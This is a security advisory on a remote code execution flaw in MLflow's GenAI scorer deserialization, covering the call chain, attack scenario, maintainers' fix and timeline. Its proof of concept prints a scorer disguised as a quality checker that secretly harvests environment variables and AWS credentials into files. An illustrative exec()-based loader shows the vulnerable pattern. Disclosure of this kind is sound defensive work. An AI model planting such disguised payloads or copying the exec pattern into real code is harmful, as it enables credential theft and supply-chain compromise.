Remote Code Execution via GenAI Scorer Deserialization in MLflow
Author: Evan Harris
Risk: High
Affected Component: MLflow GenAI scorers (mlflow/mlflow)
TL;DR
MLflow’s GenAI scorer deserialization mechanism contained a remote code execution vulnerability. The recreate_function() utility in scorer_utils.py passed attacker-controlled scorer data (stored in the MLflow tracking database) directly to Python’s exec(). A malicious scorer registered by one user executes arbitrary code on the machine of anyone who later retrieves and runs it, enabling a supply chain attack across an entire ML team. We reported the issue to the MLflow maintainers, who fixed it by restricting custom scorer registration and loading to Databricks-controlled environments. Users should upgrade to MLflow 3.5.2 or later.
Background
MLflow’s GenAI module lets teams define scorers, Python functions that evaluate the quality of LLM outputs (length checks, content safety, formatting, and so on). Scorers can be authored with the @scorer decorator, registered against an experiment, and later retrieved by name with get_scorer() so that colleagues can reuse a shared evaluation.
To make this work, MLflow serializes the scorer’s underlying function and stores it in the tracking database. When the scorer is retrieved, MLflow reconstructs the function from that stored data. The reconstruction step is where the vulnerability lived: the serialized source was reconstituted by calling Python’s exec(), which runs whatever code it is given. Because the stored data is fully attacker-controlled, anyone who could register a scorer could plant code that would execute inside another user’s process.
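The pattern can be illustrated with a minimal sketch. It is not MLflow's actual `recreate_function()`; the helper name `rebuild_from_source`, the record layout, and the harmless "payload" (setting an environment variable) are all assumptions made for illustration. It shows only that rebuilding a function from stored text with `exec()` gives whoever wrote that text control over what the function does.

```python
import os
import textwrap


def rebuild_from_source(func_name: str, signature: str, body: str):
    """Hypothetical loader: rebuild a function from stored text using exec()."""
    source = f"def {func_name}{signature}:\n" + textwrap.indent(
        textwrap.dedent(body), "    "
    )
    namespace = {}
    exec(source, namespace)  # the stored text is treated as trusted code
    return namespace[func_name]


# A record as it might come back from a shared store (illustrative layout).
stored = {
    "name": "quality_checker",
    "signature": "(outputs)",
    "body": (
        "import os\n"
        'os.environ["SCORER_DEMO_RAN"] = "1"  # harmless stand-in for a payload\n'
        "return len(outputs) > 10\n"
    ),
}

fn = rebuild_from_source(stored["name"], stored["signature"], stored["body"])
result = fn("This is test output to evaluate")
```

After the call, `result` is a plausible boolean, and the side effect written by the record's author has also taken place in the caller's process.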
Overview
The vulnerability is triggered along a single deserialization call chain that ends in exec():
    %%{init: {'themeVariables': {'fontSize': '18px'}}}%%
    flowchart TD
        A["Attacker authors malicious @scorer<br/>with payload hidden in the body"] --> B["Distributed via PyPI, GitHub,<br/>or shared Python module"]
        B --> C["Victim imports and registers<br/>the scorer with MLflow"]
        C --> D["Serialized function stored in<br/>tracking database"]
        D --> E["get_scorer(name, experiment_id)<br/>registry.py:571"]
        E --> F["Scorer.model_validate()<br/>base.py:222"]
        F --> G["_reconstruct_decorator_scorer()<br/>base.py:298"]
        G --> H["recreate_function()<br/>scorer_utils.py:131"]
        H --> I["exec(attacker_source)"]
        I --> J["Remote Code Execution<br/>in victim process"]
        style A fill:#ffebee
        style B fill:#ffebee
        style C fill:#fff3e0
        style D fill:#fff9c4
        style E fill:#fff9c4
        style F fill:#fff9c4
        style G fill:#fff9c4
        style H fill:#ffcdd2
        style I fill:#ffcdd2
        style J fill:#ffcdd2
The call chain is:
    mlflow.genai.scorers.get_scorer()
      → Scorer.model_validate()              # registry.py:571
        → _reconstruct_decorator_scorer()    # base.py:222
          → recreate_function()              # base.py:298
            → exec()                         # scorer_utils.py:131  ← REMOTE CODE EXECUTION
Attack Scenario
- An attacker authors a scorer that looks legitimate (a “quality checker” with a believable docstring) but hides a malicious payload in the function body.
- The attacker distributes the scorer through a channel the victim trusts: a PyPI package, a team GitHub repository, or a shared Python module.
- A victim imports the scorer and registers it with MLflow. The serialized function is written to the tracking database.
- Later, possibly on a different machine, by a different team member, days or weeks afterward, someone retrieves the scorer with get_scorer() and uses it.
- During deserialization, recreate_function() calls exec() on the stored source. The hidden payload runs with the full privileges of the victim’s process.
Because the trigger is separated from registration both in time and across users, the attack is silent: a single malicious scorer registered once can compromise everyone on the team who later pulls it.
Proof of Concept
The malicious scorer below presents itself as an output quality checker. The body contains a payload that drops a marker file, exfiltrates environment variables, and harvests AWS credentials before returning a plausible result to avoid suspicion:
    from mlflow.genai.scorers import scorer

    @scorer
    def quality_checker(outputs):
        """
        Quality checker for LLM outputs.

        Validates that outputs meet quality standards:
        - Minimum length requirements
        - No offensive content
        - Proper formatting

        Returns:
            bool: True if output passes quality checks
        """
        # MALICIOUS PAYLOAD HIDDEN BELOW
        import os

        # Create proof file
        os.system('touch /tmp/rce_supply_chain.txt')
        os.system('echo "COMPROMISED VIA SUPPLY CHAIN" > /tmp/rce_supply_chain.txt')

        # Exfiltrate environment variables
        env_data = dict(os.environ)
        with open('/tmp/exfiltrated_env.txt', 'w') as f:
            f.write("EXFILTRATED ENVIRONMENT:\n")
            for key, value in list(env_data.items())[:10]:
                f.write(f'{key}={value}\n')

        # Harvest AWS credentials
        aws_creds_path = os.path.expanduser('~/.aws/credentials')
        if os.path.exists(aws_creds_path):
            with open(aws_creds_path, 'r') as f_in:
                with open('/tmp/aws_credentials_stolen.txt', 'w') as f_out:
                    f_out.write(f_in.read())

        # Return a valid result to avoid suspicion
        return len(outputs) > 10
The victim retrieves the shared scorer as they normally would:
    import mlflow
    from mlflow.genai.scorers import get_scorer

    # Different machine, different user, or days later
    mlflow.set_tracking_uri("sqlite:///mlflow_tracking/mlflow.db")
    scorer = get_scorer(name="quality_checker_v1", experiment_id="1")
And then uses it:
    result = scorer(outputs="This is test output to evaluate")
At this point the RCE fires and the payload runs in the victim’s process.
Impact
Depending on the payload carried in the untrusted scorer data, an attacker can:
- Execute arbitrary Python code with the full privileges of the victim’s process
- Exfiltrate sensitive data such as credentials, environment variables, and source code
- Harvest credentials from common locations (AWS, Docker, SSH)
- Establish persistence on the victim’s machine
- Perform lateral movement and network reconnaissance
The impact is amplified by the supply chain nature of the flaw: one malicious scorer registered by a single team member can compromise every user who later retrieves it, with the trigger occurring silently long after registration.
MLflow Response
After we disclosed the issue through MLflow’s coordinated disclosure process, the maintainers addressed it in pull request #18493.
Rather than attempting to sandbox or validate the deserialized source, the maintainers removed the dangerous capability outside of controlled environments: registering and loading custom code-based scorers is now restricted to Databricks tracking environments, where the set of users who can upload scorers is controlled. Users on other tracking backends are directed toward safer alternatives such as built-in scorers and make_judge()-based scorers, which do not require arbitrary code execution during deserialization.
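The general shape of such a restriction can be sketched as a guard that refuses to rebuild code-based scorers unless the tracking backend is a controlled one. This is an illustration of the idea only, not the code from the pull request; the function names, the `kind` field, the exception type, and the URI check are all hypothetical.

```python
from urllib.parse import urlparse


class UntrustedScorerError(Exception):
    """Raised when a code-based scorer comes from an uncontrolled backend."""


def is_controlled_backend(tracking_uri: str) -> bool:
    # Assumption for this sketch: a bare "databricks" URI or a
    # "databricks://..." URI identifies a controlled environment.
    return tracking_uri == "databricks" or urlparse(tracking_uri).scheme == "databricks"


def check_scorer_record(record: dict, tracking_uri: str) -> dict:
    """Return the record only if it is safe to deserialize on this backend."""
    # "kind" is a hypothetical field marking scorers that carry source code.
    if record.get("kind") == "code" and not is_controlled_backend(tracking_uri):
        raise UntrustedScorerError(
            f"refusing to load code-based scorer {record.get('name')!r} "
            f"from {tracking_uri!r}"
        )
    return record
```

The design choice worth noting is that the guard runs before any stored source is evaluated, so a rejected record never reaches a code path that could call `exec()`.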
The fix shipped in MLflow 3.5.2.
Recommendations
For End Users
- Upgrade to MLflow 3.5.2 or later.
- Only register and retrieve custom scorers from sources you fully trust.
- Treat scorer data in a tracking database as untrusted code, not inert data. Anyone who can write to the tracking store can run code on every consumer.
- Prefer built-in scorers or make_judge() scorers, which do not execute arbitrary code during deserialization.
- Restrict write access to shared tracking databases and review scorers before reuse across a team.
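One way a team might put "review before reuse" into practice is to pin the digest of each scorer's source at review time and refuse anything that no longer matches. The sketch below assumes you can obtain the stored source as a string before it is evaluated; the `ReviewedScorers` class and its methods are hypothetical and are not part of MLflow.

```python
import hashlib
import hmac


def source_digest(source: str) -> str:
    """SHA-256 digest of the scorer source as it was reviewed."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


class ReviewedScorers:
    """Hypothetical allowlist mapping scorer names to reviewed digests."""

    def __init__(self) -> None:
        self._approved: dict[str, str] = {}

    def approve(self, name: str, source: str) -> None:
        # Call this only after a human has read the source.
        self._approved[name] = source_digest(source)

    def is_approved(self, name: str, source: str) -> bool:
        expected = self._approved.get(name)
        if expected is None:
            return False  # never reviewed
        return hmac.compare_digest(expected, source_digest(source))


reviewed = ReviewedScorers()
reviewed_source = "return len(outputs) > 10\n"
reviewed.approve("quality_checker_v1", reviewed_source)

# Any later change to the stored source, however small, fails the check.
tampered_source = "import os\n" + reviewed_source
```

Here `reviewed.is_approved("quality_checker_v1", tampered_source)` returns `False`, as does a lookup for any name that was never approved. A check like this detects modification after review; it does not make the review itself any easier, and the allowlist must live somewhere that writers to the tracking store cannot modify.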
Timeline
| Date | Event |
|---|---|
| October 20, 2025 | Vulnerability reported to MLflow maintainers via coordinated disclosure (issue #18404) |
| October 24, 2025 | MLflow merges fix (PR #18493), released in v3.5.2 |
| January 8, 2026 | huntr marked the issue as a duplicate |
| June 8, 2026 | Public disclosure |